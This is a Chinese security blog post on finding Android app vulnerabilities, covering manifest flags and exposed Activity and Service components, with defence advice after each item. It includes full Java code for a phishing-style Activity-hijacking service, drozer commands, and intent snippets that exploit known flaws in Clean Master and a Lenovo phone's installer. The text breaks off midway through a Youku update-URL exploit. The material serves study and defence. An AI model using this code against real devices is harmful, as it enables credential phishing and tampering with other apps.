

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.png">
  <link rel="icon" href="/img/avatar.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="刻苦学习逆向的小菜鸡。">
  <meta name="author" content="丨S1lenc3丨">
  <meta name="keywords" content="">
  
  <title>Android漏洞挖掘 - S1lenc3的辣鸡场</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"www.s1lenc3.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="S1lenc3的辣鸡场" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>S1lenc3</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Android漏洞挖掘">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-03-15 21:43" pubdate>
        2020年3月15日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      6.8k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      81
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Android漏洞挖掘</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：2022年2月18日 晚上
                
              </p>
            
            <div class="markdown-body">
              <p>菜鸡准备开始尝试挖洞了。先来张图。</p>
<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_8QC69M7HQFPPKFW.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_DFH8Y25AWPGVPPA.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h1 id="AndroidManifest配置相关的详情或漏洞"><a href="#AndroidManifest配置相关的详情或漏洞" class="headerlink" title="AndroidManifest配置相关的详情或漏洞"></a>AndroidManifest配置相关的详情或漏洞</h1><h2 id="程序被任意调试"><a href="#程序被任意调试" class="headerlink" title="程序被任意调试"></a>程序被任意调试</h2><p>详情：AndroidManifest.xml中android:debuggable=”true”。</p>
<p>危害：导致app可以被任意调试</p>
<p>建议：将true改为false即可。</p>
<h2 id="程序数据任意备份"><a href="#程序数据任意备份" class="headerlink" title="程序数据任意备份"></a>程序数据任意备份</h2><p>详情：AndroidManifest.xml中android:allowBackup=”true”。</p>
<p>危害：导致app应用数据可以被备份导出。</p>
<p>建议：将true改为false即可。</p>
<p>组件暴露：建议使用android:protectionLevel=”signature”验证调用来源。</p>
<h2 id="Activity组件"><a href="#Activity组件" class="headerlink" title="Activity组件"></a>Activity组件</h2><p>详情：Activity组件的exported被设置为true，或者未设置exported同时IntentFilter不为空时，可通过设置intent唤起activity。</p>
<p>危害：构造恶意数据对导出的activity进行越权攻击。</p>
<p>建议：exported设置为false，对组件进行权限控制和参数校验</p>
<p>参考学习：<a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-269211.htm#msg_header_h3_1">https://bbs.pediy.com/thread-269211.htm#msg_header_h3_1</a></p>
<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_SEK8YFRNTN3AYFB.png" srcset="/img/loading.gif" lazyload alt="image-20210905185725812"></p>
<h3 id="越权绕过"><a href="#越权绕过" class="headerlink" title="越权绕过"></a>越权绕过</h3><p>越权绕过界面验证。</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs arduino">防护策略：<br>(<span class="hljs-number">1</span>)私有Activity不应被其他应用启动相对是安全的，创建activity时：设置exported属性为<span class="hljs-built_in"><span class="hljs-literal">false</span></span><br>(<span class="hljs-number">2</span>)公开暴露的Activity组件，可以被任意应用启动，创建Activity：设置<span class="hljs-keyword">export</span>属性为<span class="hljs-literal">true</span>，谨慎处理接收的Intent，有返回数据不包含敏感信息，不应发送敏感信息，收到返回数据谨慎处理<br></code></pre></td></tr></table></figure>

<h3 id="钓鱼欺诈-Activity劫持"><a href="#钓鱼欺诈-Activity劫持" class="headerlink" title="钓鱼欺诈/Activity劫持"></a>钓鱼欺诈/Activity劫持</h3><p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_VXTN2CAWCG95V6Z.png" srcset="/img/loading.gif" lazyload alt="image-20210905191612675"></p>
<p>复现</p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs gcode">实现步骤：<br><span class="hljs-comment">(1)</span>启动一个服务<br><span class="hljs-comment">(2)</span>不断扫描当前进程<br><span class="hljs-comment">(3)</span>找到目标后弹出伪装窗口<br></code></pre></td></tr></table></figure>

<p>android6.0 劫持成功：</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">public <span class="hljs-keyword">class</span> S1hackingService extends Service &#123;<br>    <span class="hljs-keyword">private</span> boolean isStart;<br>    HashMap&lt;String, Class&lt;?&gt;&gt; map = <span class="hljs-keyword">new</span> HashMap&lt;String, Class&lt;?&gt;&gt;<span class="hljs-literal">()</span>;<br>    <span class="hljs-comment">//新建线程</span><br>    Handler handler = <span class="hljs-keyword">new</span> <span class="hljs-constructor">Handler()</span>;<br>    Runnable mTask = <span class="hljs-keyword">new</span> <span class="hljs-constructor">Runnable()</span> &#123;<br>        @Override<br>        public void run<span class="hljs-literal">()</span> &#123;<br>            <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Log</span>.</span></span>e(<span class="hljs-string">&quot;TAG&quot;</span>, <span class="hljs-string">&quot;ABC&quot;</span>);<br>            <span class="hljs-built_in">int</span> i = <span class="hljs-number">1</span>;<br>            List&lt;AndroidAppProcess&gt; appProcessInfos = <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">AndroidProcesses</span>.</span></span>get<span class="hljs-constructor">RunningAppProcesses()</span>;<br>            <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Log</span>.</span></span>e(<span class="hljs-string">&quot;TAG&quot;</span>, <span class="hljs-string">&quot;=================正在枚举进程=======================&quot;</span>);<br>            <span class="hljs-comment">//枚举进程</span><br>            <span class="hljs-keyword">for</span>( AndroidAppProcess appProcessInfo: appProcessInfos)&#123;<br>                <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Log</span>.</span></span>w(<span class="hljs-string">&quot;TAG&quot;</span>,appProcessInfo.name);<br>                <span class="hljs-keyword">try</span> &#123;<br>                    Stat stat = appProcessInfo.stat<span class="hljs-literal">()</span>;<br>                    <span class="hljs-built_in">int</span> pid = stat.get<span class="hljs-constructor">Pid()</span>;<br>                    <span class="hljs-built_in">int</span> parentProcessId = stat.ppid<span class="hljs-literal">()</span>;<br>                    long startTime = stat.stime<span class="hljs-literal">()</span>;<br>                    <span class="hljs-built_in">int</span> policy = stat.policy<span class="hljs-literal">()</span>;<br>                    <span class="hljs-built_in">char</span> state = stat.state<span class="hljs-literal">()</span>;<br>                    <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Log</span>.</span></span>w(<span class="hljs-string">&quot;TAG&quot;</span>,<span class="hljs-string">&quot;pid：&quot;</span>+pid+<span class="hljs-string">&quot; parentProcessId:&quot;</span>+parentProcessId+<span class="hljs-string">&quot; startTime:&quot;</span>+startTime+<span class="hljs-string">&quot; policy:&quot;</span>+policy+<span class="hljs-string">&quot; state:&quot;</span>+state);<br>                &#125; catch (IOException e) &#123;<br>                    e.print<span class="hljs-constructor">StackTrace()</span>;<br>                &#125;<br>                boolean isForeground = appProcessInfo.foreground;<br>                <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Log</span>.</span></span>e(<span class="hljs-string">&quot;TAG============&quot;</span>, appProcessInfo.name);<br>                <span class="hljs-keyword">if</span> (isForeground) &#123;<br>                    <span class="hljs-keyword">if</span>(map.contains<span class="hljs-constructor">Key(<span class="hljs-params">appProcessInfo</span>.<span class="hljs-params">name</span>)</span>)&#123;<br>                        <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Log</span>.</span></span>e(<span class="hljs-string">&quot;准备劫持&quot;</span>, appProcessInfo.name);<br>                        s1hacking(appProcessInfo.name);<br>                    &#125;<span class="hljs-keyword">else</span> &#123;<br>                        <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Log</span>.</span></span>e(<span class="hljs-string">&quot;not us need app&quot;</span>, appProcessInfo.name);<br>                    &#125;<br>                &#125;<br>            &#125;<br>            handler.post<span class="hljs-constructor">Delayed(<span class="hljs-params">mTask</span>, 8000)</span>;<br>        &#125;<br>        <span class="hljs-keyword">private</span> void s1hacking(String arg)&#123;<br>            <span class="hljs-keyword">if</span>(!<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">S1hackingApplication</span>.</span></span>judge<span class="hljs-constructor">Progress(<span class="hljs-params">arg</span>)</span>)&#123;<br>                Intent localIntent = <span class="hljs-keyword">new</span> <span class="hljs-constructor">Intent(S1hackingService.<span class="hljs-params">this</span>.<span class="hljs-params">getBaseContext</span>()</span>, <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">S1hackingService</span>.</span></span>this.map.get(arg));<br>                localIntent.add<span class="hljs-constructor">Flags(Intent.FLAG_ACTIVITY_NEW_TASK)</span>;<br>                <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">S1hackingService</span>.</span></span>this.get<span class="hljs-constructor">Application()</span>.start<span class="hljs-constructor">Activity(<span class="hljs-params">localIntent</span>)</span>;<br>                <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">S1hackingApplication</span>.</span></span>add<span class="hljs-constructor">Progress(<span class="hljs-params">arg</span>)</span>;<br>                <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Log</span>.</span></span>e(<span class="hljs-string">&quot;TAG====hs1hacking&quot;</span>,<span class="hljs-string">&quot;已经劫持成功&quot;</span>);<br>            &#125;<br>        &#125;<br>    &#125;;<br><br>    @Nullable<br>    @Override<br>    public IBinder on<span class="hljs-constructor">Bind(Intent <span class="hljs-params">intent</span>)</span> &#123;<br>        return null;<br>    &#125;<br><br>    public void on<span class="hljs-constructor">Create()</span>&#123;<br>        super.on<span class="hljs-constructor">Create()</span>;<br>        <span class="hljs-keyword">if</span>(!isStart)&#123;<br>            map.put(<span class="hljs-string">&quot;com.mwr.example.sieve&quot;</span>, <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">SecondActivity</span>.</span></span><span class="hljs-keyword">class</span>);<br>            this.handler.post<span class="hljs-constructor">Delayed(<span class="hljs-params">this</span>.<span class="hljs-params">mTask</span>, 1000)</span>;<br>            isStart = <span class="hljs-literal">true</span>;<br>        &#125;<br>    &#125;<br><br>    @Override<br>    public boolean stop<span class="hljs-constructor">Service(Intent <span class="hljs-params">name</span>)</span> &#123;<br>        isStart = <span class="hljs-literal">false</span>;<br>        <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Log</span>.</span></span>e(<span class="hljs-string">&quot;TAG====s1hacking&quot;</span>,<span class="hljs-string">&quot;劫持服务停止&quot;</span>);<br>        <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">S1hackingApplication</span>.</span></span>clear<span class="hljs-constructor">Progress()</span>;<br>        return super.stop<span class="hljs-constructor">Service(<span class="hljs-params">name</span>)</span>;<br>    &#125;<br>&#125;<br><br></code></pre></td></tr></table></figure>

<h3 id="拒绝服务攻击"><a href="#拒绝服务攻击" class="headerlink" title="拒绝服务攻击"></a>拒绝服务攻击</h3><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs stylus">拒绝服务攻击源于程序没有对Intent。getXXXExtra()获取的异常或者畸形数据处理时没有进行异常捕获，从而导致攻击者向应用发送此类空数据、异常或者畸形数据来达到致使该应用crash的目的，我们可以通过intent发送空数据、异常或畸形数据给正常应用，导致其崩溃。本地拒绝服务可以被竞争方利用来攻击，使得自己的应用崩溃，造成破坏。<br>  危害：拒绝服务漏洞对于锁屏应用、安全防护类软件危害是巨大的<br>  <br> 安全防护：<br>    （<span class="hljs-number">1</span>）空指针异常、类型转换异常、数组越界访问异常、类未定义异常、其它异常<br>    （<span class="hljs-number">2</span>）谨慎处理接收的intent以及其携带的信息，对接收到的任何数据做try/catch处理，以及对不符合预期数据做异常处理<br>总结：<br><span class="hljs-number">1</span>.不需要被外部调用的activity设置android:exported=<span class="hljs-string">&quot;false&quot;</span>；<br><span class="hljs-number">2</span>.若需要外部调用，需自定义signature或者signatureOrSystem级别的权限；<br><span class="hljs-number">3</span>.注册的组件请严格校验输入参数，注意空值判定和类型转换判断<br><br>&gt; run app<span class="hljs-selector-class">.activity</span><span class="hljs-selector-class">.info</span> -<span class="hljs-selector-tag">a</span> com<span class="hljs-selector-class">.mwr</span><span class="hljs-selector-class">.example</span><span class="hljs-selector-class">.sieve</span>         <span class="hljs-comment">//获取activity信息</span><br>&gt; run app<span class="hljs-selector-class">.activity</span><span class="hljs-selector-class">.start</span> --component com<span class="hljs-selector-class">.mwr</span><span class="hljs-selector-class">.example</span><span class="hljs-selector-class">.sieve</span> com<span class="hljs-selector-class">.mwr</span><span class="hljs-selector-class">.example</span><span class="hljs-selector-class">.sieve</span><span class="hljs-selector-class">.PWList</span>     <span class="hljs-comment">//启动pwlist</span><br></code></pre></td></tr></table></figure>



<h2 id="Service组件"><a href="#Service组件" class="headerlink" title="Service组件"></a>Service组件</h2><p>同Activity组件暴露相同。</p>
<p>参考学习：<a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-269255.htm">https://bbs.pediy.com/thread-269255.htm</a></p>
<h3 id="权限提升漏洞"><a href="#权限提升漏洞" class="headerlink" title="权限提升漏洞"></a>权限提升漏洞</h3><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">当一个service配置了intent-<span class="hljs-built_in">filter</span>默认是被导出的，如果没对调用Service进行权限限制或者是没有对调用者的身份进行有效验证，那么恶意构造的APP都可以对此Service传入恰当的参数进行调用，导致恶意行为发生比如调用具有<span class="hljs-keyword">system</span>权限的删除卸载服务删除卸载其他应用。<br><br></code></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-048735"><strong>猎豹清理大师内存清理权限泄露漏洞</strong></a></p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus">Android应用程序猎豹清理大师（原金山清理大师）<span class="hljs-number">4.0</span>.<span class="hljs-number">1</span>及以下版本存在权限泄漏漏洞，泄露的权限为android<span class="hljs-selector-class">.permission</span>.RESTART_PACKAGES，用来结束进程来达到清理内存的目的。当没有申请此权限的app向猎豹清理大师发送相应的intent时，便可以结束后台运行的部分app进程。<br>猎豹清理大师暴露了com<span class="hljs-selector-class">.cleanmaster</span><span class="hljs-selector-class">.appwidget</span>.WidgetService服务组件（详见下图），当向此服务发送action为com<span class="hljs-selector-class">.cleanmaster</span><span class="hljs-selector-class">.appwidget</span>.ACTION_FASTCLEAN的intent时，便可结束后台运行的一些app进程。<br></code></pre></td></tr></table></figure>

<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_UNDUAUVQQNFQGW6.png" srcset="/img/loading.gif" lazyload alt="image-20210908160946499"></p>
<figure class="highlight fortran"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs fortran"><span class="hljs-keyword">Intent</span> <span class="hljs-keyword">intent</span> = new <span class="hljs-keyword">Intent</span>();<br><span class="hljs-keyword">intent</span>.setAction(<span class="hljs-string">&quot;com.cleanmaster.appwidget.ACTION_FASTCLEAN&quot;</span>);<br><span class="hljs-keyword">intent</span>.setPackage(<span class="hljs-string">&quot;com.cleanmaster.appwidget.WidgetService&quot;</span>);<br>startService(<span class="hljs-keyword">intent</span>);<br><br>通过<span class="hljs-keyword">Intent</span>隐私启动，给服务发送<span class="hljs-keyword">action</span>为com.cleanmaster.appwidget.ACTION_FASTCLEAN的<span class="hljs-keyword">intent</span>时，便可结束后台运行的一些app进程<br></code></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2010-0509"><strong>乐phone手机任意软件包安装删除漏洞</strong></a></p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">乐phone手机出厂默认包含一个名为jp.aplix.midp.tools的应用包。本应用以system权限运行，并向其他应用提供ApkInstaller服务，用来进行对Apk文件的安装和删除。通过向ApkInstaller服务传递构造好的参数，没有声明任何权限的应用即可达到安装和删除任意Package的行为，对系统安全性产生极大影响。<br><br>Intent <span class="hljs-keyword">in</span> = <span class="hljs-keyword">new</span> <span class="hljs-constructor">Intent()</span>;<br><span class="hljs-keyword">in</span>.set<span class="hljs-constructor">Component(<span class="hljs-params">new</span> ComponentName(<span class="hljs-string">&quot;jp.aplix.midp.tools&quot;</span>,<span class="hljs-string">&quot;jp.aplix.midp.tools.ApkInstaller&quot;</span>)</span>);<br><span class="hljs-keyword">in</span>.put<span class="hljs-constructor">Extra(<span class="hljs-string">&quot;action&quot;</span>, <span class="hljs-string">&quot;deleteApk&quot;</span>)</span>;<br><span class="hljs-keyword">in</span>.put<span class="hljs-constructor">Extra(<span class="hljs-string">&quot;pkgName&quot;</span>, <span class="hljs-string">&quot;xxxxx&quot;</span>)</span>;<br>start<span class="hljs-constructor">Service(<span class="hljs-params">in</span>)</span>;<br><br>通过Intent隐式启动，外部服务启动的方式，启动action为deleteApk的服务，来达到删除任意Package的行为<br></code></pre></td></tr></table></figure>

<h3 id="service劫持"><a href="#service劫持" class="headerlink" title="service劫持"></a>service劫持</h3><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">攻击原理：隐式启动services,当存在同名services,先安装应用的services优先级高<br></code></pre></td></tr></table></figure>

<h3 id="消息伪造"><a href="#消息伪造" class="headerlink" title="消息伪造"></a>消息伪造</h3><figure class="highlight fortran"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs fortran">暴露的Service对外接收<span class="hljs-keyword">Intent</span>，如果构造恶意的消息放在<span class="hljs-keyword">Intent</span>中传输，被调用的Service接收可能产生安全隐患<br></code></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-094635"><strong>优酷Android 4.5客户端升级漏洞</strong></a></p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">优酷Android <span class="hljs-number">4.5</span>客户端组件暴露导致第三方应用可以触发其升级过程，同时可以指定升级下载的URL地址，可导致任意应用安装！<br>源代码：<br>protected void on<span class="hljs-constructor">HandleIntent(Intent <span class="hljs-params">intent</span>)</span> &#123;<br>        Intent v0;<br>        String v23;<br>        Serializable pushMsg = intent.get<span class="hljs-constructor">SerializableExtra(<span class="hljs-string">&quot;PushMsg&quot;</span>)</span>;<br>        ......<br>        <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">AppVersionManager</span>.</span></span>get<span class="hljs-constructor">Instance(Youku.<span class="hljs-params">context</span>)</span>.show<span class="hljs-constructor">AppAgreementDialog()</span>;<br>        switch(pushMsg.<span class="hljs-keyword">type</span>) &#123;<br>            case <span class="hljs-number">1</span>: &#123;<br>                goto label_53;<br>            &#125;<br>            ......<br>        &#125;<br>        ......<br>    label_53:<br>        intent.set<span class="hljs-constructor">Flags(876609536)</span>;<br>        intent.set<span class="hljs-constructor">Class(<span class="hljs-params">this</span>, UpdateActivity.<span class="hljs-params">class</span>)</span>;<br>        intent.put<span class="hljs-constructor">Extra(<span class="hljs-string">&quot;updateurl&quot;</span>, <span class="hljs-params">pushMsg</span>.<span class="hljs-params">updateurl</span>)</span>;<br>        intent.put<span class="hljs-constructor">Extra(<span class="hljs-string">&quot;updateversion&quot;</span>, <span class="hljs-params">pushMsg</span>.<span class="hljs-params">updateversion</span>)</span>;<br>        intent.put<span class="hljs-constructor">Extra(<span class="hljs-string">&quot;updatecontent&quot;</span>, <span class="hljs-params">pushMsg</span>.<span class="hljs-params">updatecontent</span>)</span>;<br>        intent.put<span class="hljs-constructor">Extra(<span class="hljs-string">&quot;updateType&quot;</span>, 2)</span>;<br>        this.start<span class="hljs-constructor">Activity(<span class="hljs-params">intent</span>)</span>;<br>        return;<br>    ......<br><br>分析：<br>我们可以发现从Intent从获取名为PushMsg的Serializable的数据，并根据其成员<span class="hljs-keyword">type</span>来执行不同的流程，当<span class="hljs-keyword">type</span>值为<span class="hljs-number">1</span>时，执行App的升级操作。升级所需的相关数据如app的下载地址等也是从该序列化数据中获取。升级的具体流程在com.youku.ui.activity.UpdateActivity中，简单分析后发现升级过程未对下载地址等进行判断，因此可以任意指定该地址。<br><br><br>攻击：<br><span class="hljs-number">1.</span>创建一个Android App程序，在主Activity中的关键代码如下：<br> <br> <br>PushMsg pushMsg = <span class="hljs-keyword">new</span> <span class="hljs-constructor">PushMsg()</span>;<br>pushMsg.<span class="hljs-keyword">type</span> = <span class="hljs-number">1</span>;<br>pushMsg.updateurl = <span 